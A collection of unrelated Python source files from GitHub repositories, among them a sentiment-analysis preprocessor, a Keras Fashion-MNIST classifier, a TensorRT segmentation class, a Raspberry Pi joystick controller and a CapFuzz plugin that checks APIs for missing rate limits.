'.join(vec))\r\n f.write('\\n')\r\n return word2vec\r\n\r\n# 将句子中的词转换为对应的id数组和标签值\r\ndef text_to_array(word2id, seq_lenth, path):\r\n\r\n label_array = []\r\n i = 0\r\n sa = []\r\n\r\n # 句子数量\r\n sa_count = len(open(path, encoding='utf-8').readlines())\r\n\r\n with open(path, encoding='utf-8') as f:\r\n # 句子id矩阵每个元素初始为0\r\n sentences_array = np.zeros(shape=(sa_count, seq_lenth))\r\n for line in f.readlines():\r\n data = line.strip().split()\r\n words = data[1:]\r\n ids = [word2id.get(word, 0) for word in words]\r\n ids_array = np.array(ids).reshape(1, -1)\r\n\r\n # 比序列长度短的在前面补0\r\n # sentences_array 后面ids_array长度的值替换为ids_array中的值\r\n # sentences_array 前面的值还是原来初始的0,相当于在前面补0\r\n if np.size(ids_array, 1) < seq_lenth:\r\n sentences_array[i, seq_lenth - np.size(ids_array, 1):] = ids_array[0, :]\r\n # 比序列长度长的直接截断,只取序列长度\r\n else:\r\n sentences_array[i, 0:seq_lenth] = ids_array[0, 0:seq_lenth]\r\n\r\n i = i + 1\r\n # 取标签值\r\n label_array.append(int(data[0]))\r\n\r\n return np.array(sentences_array), label_array\r\n\r\n# 将句子中的词转换为对应的id数组\r\ndef text_to_array_no_label(word2id, seq_lenth, path):\r\n\r\n i = 0\r\n sa = []\r\n\r\n # 句子数量\r\n sa_count = len(open(path, encoding='utf-8').readlines())\r\n\r\n with open(path, encoding='utf-8') as f:\r\n # 句子id矩阵每个元素初始为0\r\n sentences_array = np.zeros(shape=(sa_count, seq_lenth))\r\n for line in f.readlines():\r\n data = line.strip().split()\r\n words = data[1:]\r\n ids = [word2id.get(word, 0) for word in words]\r\n ids_array = np.array(ids).reshape(1, -1)\r\n\r\n # 比序列长度短的在前面补0\r\n # sentences_array 后面ids_array长度的值替换为ids_array中的值\r\n # sentences_array 前面的值还是原来初始的0,相当于在前面补0\r\n if np.size(ids_array, 1) < seq_lenth:\r\n sentences_array[i, seq_lenth - np.size(ids_array, 1):] = ids_array[0, :]\r\n # 比序列长度长的直接截断,只取序列长度\r\n else:\r\n sentences_array[i, 0:seq_lenth] = ids_array[0, 0:seq_lenth]\r\n\r\n i = i + 1\r\n\r\n return np.array(sentences_array)\r\n\r\n# 准备训练数据,验证数据,测试数据\r\ndef prepare_data(word2id, train_path, val_path, test_path, seq_lenth):\r\n\r\n train_array, train_lable = text_to_array(word2id, seq_lenth, train_path)\r\n val_array, val_lable = text_to_array(word2id, seq_lenth, val_path)\r\n test_array, test_lable = text_to_array(word2id, seq_lenth, test_path)\r\n\r\n train_lable = np.array(train_lable).T\r\n val_lable = np.array(val_lable).T\r\n test_lable = np.array(test_lable).T\r\n\r\n return train_array, train_lable, val_array, val_lable, test_array, test_lable\r\n\r\n# 准备训练数据,验证数据\r\ndef prepare_train_data(word2id, train_path, val_path, seq_lenth):\r\n\r\n train_array, train_lable = 
text_to_array(word2id, seq_lenth, train_path)\r\n val_array, val_lable = text_to_array(word2id, seq_lenth, val_path)\r\n\r\n train_lable = np.array(train_lable).T\r\n val_lable = np.array(val_lable).T\r\n\r\n return train_array, train_lable, val_array, val_lable\r\n\r\n# 准备训练数据,验证数据\r\ndef prepare_test_data(word2id, test_path, seq_lenth):\r\n\r\n test_array, test_lable = text_to_array(word2id, seq_lenth, test_path)\r\n test_lable = np.array(test_lable).T\r\n return test_array, test_lable\r\n\r\n\r\nif __name__ == '__main__':\r\n # 构建训练集和验证集的词到id表示\r\n build_word2id(save_to_path=Config.word2id_path)\r\n \r\n splist = []\r\n word2id = {}\r\n\r\n # 转换为字典 word : id\r\n with open(Config.word2id_path, encoding='utf-8') as f:\r\n for line in f.readlines():\r\n sp = line.strip().split()\r\n splist.append(sp)\r\n word2id = dict(splist)\r\n\r\n for key in word2id:\r\n word2id[key] = int(word2id[key])\r\n\r\n # 转换为字典 id : word\r\n id2word = {}\r\n for key, value in word2id.items():\r\n id2word[value] = key\r\n\r\n # 构建所有词的词向量\r\n word2vec = build_word2vec(Config.pre_word2vec_path,\r\n word2id, Config.corpus_word2vec_path)\r\n\r\n # 转换句子id表示和标签\r\n train_array, train_lable, \\\r\n val_array, val_lable, \\\r\n test_array, test_label = prepare_data(word2id,\r\n Config.train_path,\r\n Config.val_path,\r\n Config.test_path, \r\n Config.max_sen_len)\r\n\r\n # 保存训练数据,验证数据,测试数据的id表示形式\r\n np.savetxt(Config.train_data_path, train_array, fmt='%d')\r\n np.savetxt(Config.val_data_path, val_array, fmt='%d')\r\n np.savetxt(Config.test_data_path, test_array, fmt='%d')","repo_name":"yzhhome/Sentiment-Analysis-Pytorch","sub_path":"SA_DataProcess.py","file_name":"SA_DataProcess.py","file_ext":"py","file_size_in_byte":8514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"11495992452","text":"import unittest\n\nfrom fbdl.packages import Packages\n\npackages = Packages()\n\npackages['foo'] = [\n {'Path': \"/zero/fbd-foo\"},\n {'Path': \"/zero/one/fbd-foo\"},\n {'Path': \"/zero/one/two/fbd-foo\"},\n]\n\n\npackages['bar'] = [{'Path': \"/some/path/fbd/bar\"}]\n\n\nclass TestGettingRefToPackage(unittest.TestCase):\n def test_get_ref_to_foo(self):\n ref = packages.get_ref_to_pkg(\"zero/fbd-foo\")\n self.assertEqual(ref, packages['foo'][0])\n\n ref = packages.get_ref_to_pkg(\"zero/one/fbd-foo\")\n self.assertEqual(ref, packages['foo'][1])\n\n ref = packages.get_ref_to_pkg(\"two/fbd-foo\")\n self.assertEqual(ref, packages['foo'][2])\n\n def test_get_ref_to_bar(self):\n ref = packages.get_ref_to_pkg(\"bar\")\n self.assertEqual(ref, packages['bar'][0])\n","repo_name":"Functional-Bus-Description-Language/PyFBDL","sub_path":"fbdl/tests/packages/test_get_ref_to_package.py","file_name":"test_get_ref_to_package.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"31574066294","text":"import time\nimport threading\ndef fun1(a):\n print(\"fun1 start\",time.ctime())\n print(\"我是参数\",a)\n time.sleep(2)\n print(\"fun1 end:\",time.ctime())\ndef fun2(a,b):\n print(\"fun2 start\", time.ctime())\n print(\"我是参数\", a,\" ,我是参数\",b)\n time.sleep(3)\n print(\"fun1 end:\", time.ctime())\ndef main():\n print(\"start doing\")\n t1=threading.Thread(target=fun1,args=(\"韩广阳\",))\n t1.start()\n\n t2=threading.Thread(target=fun2,args=(\"吴亦凡\",\"鹿晗\"))\n t2.start()\n\n t1.join()\n t2.join()\n\n print(\"end doing\")\nif __name__==\"__main__\":\n 
main()\n","repo_name":"1361217049/python","sub_path":"多线程/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"15159742869","text":"\r\n#%%\r\n\r\nimport sys\r\n\r\nsys.setrecursionlimit(5001)\r\n\r\nfib = [0]*5001\r\n\r\ndef compute(n):\r\n if n == 0:\r\n return 0\r\n elif n == 1:\r\n return 1\r\n elif fib[n] != 0:\r\n return fib[n]\r\n else:\r\n fib[n] = compute(n-1) + compute(n-2)\r\n return fib[n]\r\n\r\nwhile True:\r\n try:\r\n n = int(input())\r\n \r\n print(\"The Fibonacci number for \" + str(n) + \" is \" + str(compute(n)))\r\n except EOFError:\r\n break\r\n ","repo_name":"TashreefMuhammad/UVA_Problem_Solutions","sub_path":"UVA_00495.py","file_name":"UVA_00495.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"2736739229","text":"from keras.datasets import cifar10, fashion_mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom sklearn.metrics import confusion_matrix\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n(X_train, y_train), (X_test, y_test) = fashion_mnist.load_data()\n\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\n# Display the first 10 images with their corresponding class names\nplt.figure(figsize=(10, 10))\nfor i in range(10):\n plt.subplot(2, 5, i + 1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(X_train[i], cmap=plt.cm.binary)\n plt.xlabel(class_names[y_train[i]])\nplt.show()\n\nX_train = X_train.astype('float32') / 255\nX_test = X_test.astype('float32') / 255\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1)))\nmodel.add(MaxPooling2D((2, 2)))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D((2, 2)))\nmodel.add(Conv2D(128, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D((2, 2)))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(10, activation='softmax'))\n\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n\nmodel.fit(X_train, y_train, epochs=10, batch_size=32)\n\nscores = model.evaluate(X_test, y_test, verbose=0)\nprint(\"Accuracy: %.2f%%\" % (scores[1] * 100))\n\nmodel.save('fmnist.h5')\n","repo_name":"kiIIer/kpi-4","sub_path":"machine-l/lab/lab-5-30.04.2023/skynet/fmnist.py","file_name":"fmnist.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"5423382108","text":"import os.path as path\nimport mysql.connector, sys, json, time\nfrom constants import *\n\nwith open(path.join(PROCESSED_PATH, 'cohort_hour_staged.csv'), 'r') as csv_data:\n with open('.dbconfig.json') as cf:\n cfgs = json.loads(cf.read())\n mydb = mysql.connector.connect(**cfgs)\n cursor = mydb.cursor()\n\n i = 0\n t0 = time.time()\n for row in csv_data:\n i += 1\n if i % 10000 == 0:\n print(\"row: \", i)\n cursor.execute(\n \"INSERT INTO cohort_hour_staged(SUBJECT_ID, HADM_ID, age, ETHNICITY, GENDER, time, SCr, VALUEUOM, BASELINE, RATIO, STAGE) VALUES(%s)\" % row\n )\n #close the connection to the database.\n mydb.commit()\n cursor.close()\n t1 = time.time()\n print(\"took %f s\" % (t1 - t0))\n 
print(\"total rows: \", i)\n","repo_name":"ramsir3/AMIA2019","sub_path":"loadCSV.py","file_name":"loadCSV.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"13532005035","text":"from utils import escape, repeat_to_length\n\nDEFAULT_HARVESTERS = ['MarkdownUrlHarvester,harvest.harvesters']\n\n\ndef harvest(text, harvesters=DEFAULT_HARVESTERS):\n instances = [load_class(namespace) for namespace in harvesters]\n\n display_text = ''\n display_html = ''\n\n entities = []\n\n current_text = text\n\n for instance in instances:\n e = instance.harvest(current_text)\n\n current_position = 0\n for entity in e:\n entities.append(entity)\n current_position = entity.start_index\n l = len(entity.original_text)\n replacement = repeat_to_length(' ', l)\n current_text = current_text[:current_position] + \\\n replacement + current_text[current_position + l:]\n\n current_index = 0\n for entity in entities:\n display_html = display_html + escape(text[current_index:entity.start_index]) + entity.display_html\n display_text = display_text + escape(text[current_index:entity.start_index]) + entity.display_text\n current_index = entity.end_index\n\n display_text = display_text + escape(text[current_index:])\n display_html = display_html + escape(text[current_index:])\n\n return {\n 'display_text': display_text,\n 'display_html': display_html,\n }\n\n\ndef load_class(namespace):\n module = __import__(namespace.split(',')[1])\n return getattr(module, namespace.split(',')[0])()\n","repo_name":"jpennell/harvest","sub_path":"harvest/harvest.py","file_name":"harvest.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"71668760691","text":"#!/usr/bin/env python\nfrom diagrams import Diagram\nfrom diagrams.onprem.database import PostgreSQL\nfrom diagrams.onprem.database import MongoDB\nfrom diagrams.onprem.compute import Server\nfrom diagrams.custom import Custom\n\nwith Diagram(\"Sample Bank Architecture\", show=False):\n maps = Custom(\"Google Maps API\", \"./maps.png\")\n\n dns = Server(\"DNS\")\n\n front = Custom(\"Frontend\", \"./react.png\")\n\n am = Custom(\"Account Manager\", \"./node.png\")\n ps = Custom(\"Plan Simulator\", \"./node.png\")\n bf = Custom(\"Branch Finder\", \"./ts.png\")\n\n db1 = PostgreSQL(\"PostgreSQL\")\n db2 = PostgreSQL(\"PostgreSQL\")\n db3 = MongoDB(\"MongoDB\")\n\n dns >> front >> am\n front >> ps\n front >> bf\n\n am >> db1\n ps >> db2\n bf >> db3\n bf >> maps","repo_name":"amirelemam/sample-bank-webapp","sub_path":"architecture-diagram/architecture-diagram.py","file_name":"architecture-diagram.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"35016120523","text":"import os,sys,codecs\nfrom random import randint\n\nsens=codecs.open(os.path.abspath(sys.argv[1]),'r').read().strip().split('\\n\\n')\nneeded=int(sys.argv[2])\nwriter=codecs.open(os.path.abspath(sys.argv[3]),'w')\ngenerated=set()\n\ncount=0\n\nwhile count -0.5:\n\t\t\tGPIO.output(37,GPIO.LOW)\n\t\t\tGPIO.output(35,GPIO.LOW)\n\t\t\tGPIO.output(33,GPIO.LOW)\n\t\t\tGPIO.output(31,GPIO.LOW)\n\t\t\tprint('##### Stop #####')\n\t\telif e.axis == 0 and e.value >= 0.5:\n\t\t\tGPIO.output(37,GPIO.LOW)\n\t\t\tGPIO.output(35,GPIO.HIGH)\n\t\t\tGPIO.output(33,GPIO.HIGH)\n\t\t\tGPIO.output(31,GPIO.LOW)\n\t\t\tprint('Right')\n\t\telif e.axis 
== 0 and e.value <= -0.5:\n\t\t\tGPIO.output(37,GPIO.HIGH)\n\t\t\tGPIO.output(35,GPIO.LOW)\n\t\t\tGPIO.output(33,GPIO.LOW)\n\t\t\tGPIO.output(31,GPIO.HIGH)\n\t\t\tprint('Left')\n\t\telif e.axis == 1 and e.value >= 0.5:\n\t\t\tGPIO.output(37,GPIO.LOW)\n\t\t\tGPIO.output(35,GPIO.HIGH)\n\t\t\tGPIO.output(33,GPIO.LOW)\n\t\t\tGPIO.output(31,GPIO.HIGH)\n\t\t\tprint('Down')\n\t\telif e.axis == 1 and e.value <= -0.5:\n\t\t\tGPIO.output(37,GPIO.HIGH)\n\t\t\tGPIO.output(35,GPIO.LOW)\n\t\t\tGPIO.output(33,GPIO.HIGH)\n\t\t\tGPIO.output(31,GPIO.LOW)\n\t\t\tprint('Up')\n\t\n\te = event.wait()\n\npwm.stop()\nGPIO.cleanup()","repo_name":"7enTropy7/cypher_droid","sub_path":"Flask and Hardware/responsive_control.py","file_name":"responsive_control.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"27547300379","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom face_alignment import FaceAlignment, LandmarksType\nfrom .utils.bfm import load_lm3d\nfrom .utils.align_batch import align_img_batch\n\n\nclass Preprocessor(nn.Module):\n def __init__(self, bfm_folder, **kwargs):\n super(Preprocessor, self).__init__()\n self.lm3d_std = load_lm3d(bfm_folder)\n self.device = 'cpu'\n self.kwargs = kwargs\n self.fa = FaceAlignment(LandmarksType._2D, device=self.device, **kwargs)\n \n def to(self, device):\n self.device = device\n self.fa = FaceAlignment(LandmarksType._2D, device=self.device, **self.kwargs)\n return self\n \n def cuda(self):\n self.device = 'cuda'\n self.fa = FaceAlignment(LandmarksType._2D, device=self.device, **self.kwargs)\n return self\n \n def cpu(self):\n self.device = 'cpu'\n self.fa = FaceAlignment(LandmarksType._2D, device=self.device, **self.kwargs)\n return self\n\n def extract_bboxs(self, x):\n \"\"\"\n Extract bounding boxes from input frames.\n\n Args:\n x (torch.tensor): Input frames in (N, H, W, C)\n Returns:\n list[np.array]: Bounding boxes in (4, )\n \"\"\"\n x = x.permute(0, 3, 1, 2).float().to(self.device)\n return self.fa.face_detector.detect_from_batch(x)\n \n def extract_keypoints(self, x):\n \"\"\"\n Extract keypoints from input frames.\n\n Args:\n x (torch.tensor): Input frames in (N, H, W, C)\n Returns:\n list[np.array]: Keypoints in (68, 2)\n \"\"\"\n x = x.permute(0, 3, 1, 2).float().to(self.device)\n return self.fa.get_landmarks_from_batch(x)\n\n def align_and_recrop(self, x):\n \"\"\"\n Perform face alignment and recrop the input frames.\n\n Args:\n x (torch.tensor): Input frames in (N, H, W, C)\n Returns:\n torch.tensor: Transform parameters in (N, 5)\n torch.tensor: Aligned and recropped frames in (N, H, W, C)\n torch.tensor: Aligned and recropped landmarks in (N, 68, 2)\n torch.tensor: Aligned and recropped masks in (N, H, W)\n \"\"\"\n keypoints = self.extract_keypoints(x)\n keypoints = np.stack([e if e is not None else -1 * np.ones((68, 2)) for e in keypoints])\n trans_params, new_images, new_landmarks, new_masks = align_img_batch(\n x,\n torch.from_numpy(keypoints).to(self.device),\n torch.from_numpy(self.lm3d_std).to(self.device),\n )\n return trans_params, new_images, new_landmarks, new_masks\n \n def prepare_input(self, x):\n \"\"\"\n Convert input frames to the format required by the network. 
The device is not changed.\n\n Args:\n x (torch.tensor): Input frames in (N, H, W, C)\n Returns:\n torch.tensor: Normalized input frames in (N, C, H, W)\n \"\"\"\n x = x.permute(0, 3, 1, 2).float()\n if x.shape[2] != 224 or x.shape[3] != 224:\n x = F.interpolate(x, size=(224, 224), mode='bicubic', align_corners=False)\n x /= 255.\n return x\n","repo_name":"dc3ea9f/face_utils","sub_path":"face_utils/recons/DeepFace3DRecon/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"17475147005","text":"import capfuzz.settings as settings\nfrom capfuzz.core.utils import (\n HTTPDumper\n)\nfrom capfuzz.fuzzer.plugins.utils.helper import (\n get_content_type_lower\n)\napi_reason = {}\napi_code = {}\n\ndef response_analyzer(flow, options):\n \"\"\"\n Totally Async\n Reimplement\n print (api_req)\n \"\"\"\n\n global api_reason, api_code\n meta = flow.metadata[\"fuzz_api\"]\n res = flow.response\n write = options[\"write\"]\n api_req = meta[\"api_rate_limit\"]\n api_name = meta[\"api_name\"]\n #Why 5 we are not sure whats the order\n if api_req in [1, 2, 3, 4, 5]:\n api_reason[api_name] = flow.response.reason\n api_code[api_name] = flow.response.status_code\n if api_req == settings.RATELIMIT_REQ_NOS - 1:\n if api_reason[api_name] == flow.response.reason or api_code[api_name] == flow.response.status_code:\n write(\"\\n[VULN] API may not be rate limited (Requests %s) - %s\" %\n (str(api_req + 1), flow.request.url), type=\"danger\")\n http_dumper = HTTPDumper(options[\"report_file\"], False)\n http_dumper.dump(\"===========================\")\n http_dumper.dump(\"API may not be rate limited\")\n http_dumper.dump(\"===========================\")\n http_dumper.save_http(flow)\n\n","repo_name":"MobSF/CapFuzz","sub_path":"capfuzz/fuzzer/plugins/api/api_resp.py","file_name":"api_resp.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"20"} +{"seq_id":"17009607359","text":"import numpy as np\nfrom database import *\n\n\ndef synchronize(vec_real, vec_pred):\n if len(vec_real) == len(vec_pred):\n return\n\n if len(vec_real) < len(vec_pred):\n res = []\n res.extend(vec_real)\n res.extend(vec_pred[len(vec_real)+1:])\n vec_real = np.array(res)\n else:\n res = []\n res.extend(vec_pred)\n res.extend(vec_real[len(vec_pred)+1])\n vec_pred = np.array(res)\n\n return vec_real, vec_pred\n\n\ndef equals_of_vectors(vector_real, vector_predict):\n if len(vector_predict) != len(vector_predict):\n vector_real, vector_predict = synchronize(vector_real, vector_predict)\n\n norm1 = np.linalg.norm(vector_real, 2)\n norm2 = np.linalg.norm(vector_predict, 2)\n\n return (norm1 - norm2)/(norm1 + norm2)\n\n\ndef predictDeppression(patient_id):\n real = np.array([])\n pred = np.array([])\n answerlogs = AnswerLogRecords.select().where(AnswerLogRecords.patient_id == patient_id)\n for answer in answerlogs:\n question = Questions.select().where(Questions.id == answer.real_emotion).get()\n np.append(real, question.sentiment_id)\n # print(answer.real_emotion)\n\n print(real)\n changelogs = ChangeLogRecords.select().where(ChangeLogRecords.patient_id == patient_id)\n for change in changelogs:\n print(change.current_emotion_id)\n question = Questions.select().where(Questions.id == change.current_emotion_id).get()\n np.append(pred, question.Sentiment_id)\n print(question.sentiment_id)\n # 
print(change.current_emotion_id)\n return real,pred\n\nif __name__ == '__main__':\n real = np.array([1, 2, 1, 2,1,0,1,1,2,0,0,2,1,2,2,1,2,0,2,1])\n pred = np.array([1, 2, 1, 2,1,0,0,1,2,1,0,1,1,0,2,1,2,1,2,1])\n print(equals_of_vectors(real, pred))\n","repo_name":"Iorgen/NeuroHackaton","sub_path":"Face_recog/vectors.py","file_name":"vectors.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"23946259333","text":"# -*- coding: utf-8 -*-\n\nfrom plugin_package.content_package import ContentPackage\nfrom gluon.tools import PluginManager\nfrom plugin_ckeditor import CKEditor\n\nif False:\n from gluon import current\n from gluon import Field\n response = current.response\n request = current.request\n T = current.T\n from db import db, auth\n\n\ndef _():\n plugins = PluginManager('package', app=None)\n if plugins.package.app is not None:\n # this will register the the application on content/type\n plugins.package.app.registerContentType('package', ContentPackage())\n\n if not hasattr(db, 'plugin_package_content'):\n editor = CKEditor(db=db)\n tbl = db.define_table(\n 'plugin_package_content',\n Field('item_list', 'list:string'),\n Field('description', 'text'),\n Field('item_id', 'string', length=64),\n auth.signature,\n )\n tbl.item_id.writable = False\n tbl.item_id.readable = False\n tbl.item_list.writable = False\n tbl.item_list.readable = False\n tbl.description.label = T('Description')\n tbl.description.widget = editor.widget\n tbl._enable_record_versioning()\n\n # add a callback to the item table for updating the item list of\n # the package on item deletion.\n def plugin_package_callback(s):\n item = s.select().first()\n # this are the packages with contains the item to delete\n pkgs = db(\n db.plugin_package_content.item_list.contains(\n item.unique_id)\n ).select()\n for pkg in pkgs:\n # remove the item from the package\n pkg.item_list.remove(item.unique_id)\n pkg.update_record()\n\n return False\n db.item._before_delete.insert(0, plugin_package_callback)\n\n_()\n","repo_name":"ybenitezf/nstock","sub_path":"models/plugin_package.py","file_name":"plugin_package.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"20"} +{"seq_id":"18179493828","text":"\"\"\"\nEscribir un programa que guarde en un diccionario los precios de las frutas de la tabla, pregunte al usuario por una fruta, un número de kilos y muestre por pantalla el precio de ese número de kilos de fruta. Si la fruta no está en el diccionario debe mostrar un mensaje informando de ello. 
\n\"\"\"\n\ndef comprobar_fruta(precio_frutas, fruta):\n return precio_frutas.get(fruta)\n\nif __name__ == \"__main__\":\n\n precio_frutas = {\"PLATANO\" : 1.35, \"MANZANA\" : 0.80, \"PERA\" : 0.85, \"NARANJA\" : 0.70}\n\n #Entrada\n fruta = input(\"Elige una fruta de la lista(PLATANO-MANZANA-PERA-NARANJA): \")\n fruta = fruta.upper()\n\n #Procesar\n resultado = comprobar_fruta(precio_frutas, fruta)\n\n if resultado:\n kilo = float(input(\"Introduce los kilos de fruta: \"))\n precio = resultado * kilo\n \n #Salida\n print(\"Has seleccionado \" + str(kilo) + \" kg de \" + fruta + \", son \" + str(precio) + \" euros\" ) \n else:\n #Salida\n print(\"No disponemos de esa fruta, por favor elige una de la lista!!\")\n \n\n ","repo_name":"IES-Rafael-Alberti/2324-u3-diccionarios-eloyesteban","sub_path":"src/ejercicio3.py","file_name":"ejercicio3.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"39350331737","text":"import math \n\ndef solution(str1, str2):\n d = {}\n for i in range(len(str1)-1):\n s = str1[i:i+2]\n s = s.lower()\n if s.isalpha():\n if d.get(s):\n d[s][0] += 1\n else:\n d[s] = [1, 0]\n for i in range(len(str2)-1):\n s = str2[i:i+2]\n s = s.lower()\n if s.isalpha():\n if d.get(s):\n d[s][1] += 1\n else:\n d[s] = [0, 1]\n \n i = 0; u = 0\n for keyword in d:\n i += min(d[keyword])\n u += max(d[keyword])\n \n if u == 0: \n answer = 65536\n else: \n answer = math.floor((i/u) * 65536)\n \n return answer\n","repo_name":"jaejae2374/CodingTest","sub_path":"kakao/Cache/뉴스클러스터링/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"31462832182","text":"import argparse\nfrom segcolors import colors\nimport numpy as np\nimport tensorrt as trt\nimport pycuda.driver as cuda\nimport pycuda.autoinit\nimport pdb\nimport os\nimport cv2\nimport time\n\nclass TRTSegmentor(object):\n\tdef __init__(self, \n\t\tonnxpath, \n\t\tcolors,\n\t\tinsize=(640,360),\n\t\tmaxworkspace=(1<<25), \n\t\tprecision='FP16', \n\t\tdevice='GPU', \n\t\tmax_batch_size=1, \n\t\tcalibrator=None, \n\t\tdla_core=0\n\t\t):\n\t\tself.onnxpath=onnxpath\n\t\tself.enginepath=onnxpath+f'.{precision}.{device}.{dla_core}.{max_batch_size}.trt'\n\t\t#filename to be used for saving and reading engines\n\t\tself.nclasses=21\n\t\tself.pp_mean=np.array([0.485, 0.456, 0.406]).reshape((1,1,3))\n\t\tself.pp_stdev=np.array([0.229, 0.224, 0.225]).reshape((1,1,3))\n\t\t#mean and stdev for pre-processing images, see torchvision documentation\n\t\tself.colors=colors #colormap for 21 classes of Pascal VOC\n\t\t\n\t\tself.in_w=insize[0]\n\t\tself.in_h=insize[1] #width, height of input images\n\n\t\t#here we specify very important engine build flags\n\t\tself.maxworkspace=maxworkspace\n\t\tself.max_batch_size=max_batch_size\n\t\t\n\t\tself.precision_str=precision\n\t\tself.precision={'FP16':0, 'INT8':1, 'FP32': -1}[precision]\n\t\t#mapping strings to tensorrt precision flags\n\n\t\tself.device={'GPU':trt.DeviceType.GPU, 'DLA': trt.DeviceType.DLA}[device]\n\t\t#mapping strings to tensorrt device types\n\n\t\tself.dla_core=dla_core #used only if DLA device is selected\n\t\tself.calibrator=calibrator #used only for INT8 precision\n\t\tself.allowGPUFallback=3 #used only if DLA is selected\n\t\t\n\t\tself.engine, self.logger= 
self.parse_or_load()\n\t\t\n\t\tself.context=self.engine.create_execution_context()\n\t\tself.trt2np_dtype={'FLOAT':np.float32, 'HALF':np.float16, 'INT8':np.int8}\n\t\tself.dtype = self.trt2np_dtype[self.engine.get_binding_dtype(0).name]\n\t\t\n\t\tself.allocate_buffers(np.zeros((1,3,self.in_h,self.in_w), dtype=self.dtype))\n\n\tdef allocate_buffers(self, image):\n\t\tpass\n\t\tinsize=image.shape[-2:]\n\t\toutsize=[insize[0] >> 3, insize[1] >> 3]\n\t\tself.output=np.empty((self.nclasses,outsize[0],outsize[1]), dtype=self.dtype)\n\t\tself.d_input=cuda.mem_alloc(image.nbytes)\n\t\tself.d_output=cuda.mem_alloc(self.output.nbytes)\n\n\t\tself.bindings=[int(self.d_input), int(self.d_output)]\n\t\t#print(self.bindings)\n\t\tself.stream=cuda.Stream()\n\n\tdef preprocess(self, img):\n\t\timg=cv2.resize(img,(self.in_w,self.in_h))\n\t\timg=img[...,::-1]\n\t\timg=img.astype(np.float32)/255\n\t\timg=(img-self.pp_mean)/self.pp_stdev\n\n\t\timg=np.transpose(img,(2,0,1))\n\t\timg=np.ascontiguousarray(img[None,...]).astype(self.dtype)\n\n\t\treturn img\n\n\tdef infer(self, image, benchmark=False):\n\t\t\"\"\"\n\t\timage: unresized,\n\t\t\"\"\"\n\t\tintensor=self.preprocess(image)\n\n\t\tstart=time.time()\n\n\t\tcuda.memcpy_htod_async(self.d_input, intensor, self.stream)\n\t\tself.context.execute_async_v2(self.bindings, self.stream.handle, None)\n\t\tcuda.memcpy_dtoh_async(self.output, self.d_output, self.stream)\n\n\t\tself.stream.synchronize()\n\t\t\n\t\tif benchmark:\n\t\t\tduration=(time.time()-start)\n\t\t\treturn duration\n\n\tdef infer_async(self, intensor):\n\t\t#intensor should be preprocessed tensor\n\t\tcuda.memcpy_htod_async(self.d_input, intensor, self.stream)\n\t\tself.context.execute_async_v2(self.bindings, self.stream.handle, None)\n\t\tcuda.memcpy_dtoh_async(self.output, self.d_output, self.stream)\n\n\tdef draw(self, img):\n\t\tshape=(img.shape[1],img.shape[0])\n\t\tsegres=np.transpose(self.output,(1,2,0)).astype(np.float32)\n\n\t\tsegres=cv2.resize(segres, shape)\n\t\tmask=segres.argmax(axis=-1)\n\t\tcolored=self.colors[mask]\n\n\t\tdrawn=cv2.addWeighted(img, 0.5, colored, 0.5, 0.0)\n\t\treturn drawn\n\n\tdef infervideo(self, infile):\n\t\tsrc=cv2.VideoCapture(infile)\n\t\tret,frame=src.read()\n\t\tfps=0.0\n\n\t\tif not ret:\n\t\t\tprint('Cannot read file/camera: {}'.format(infile))\n\n\t\twhile ret:\n\t\t\tduration=self.infer(frame, benchmark=True)\n\t\t\tdrawn=self.draw(frame)\n\t\t\tcv2.imshow('segmented', drawn)\n\t\t\tk=cv2.waitKey(1)\n\t\t\tif 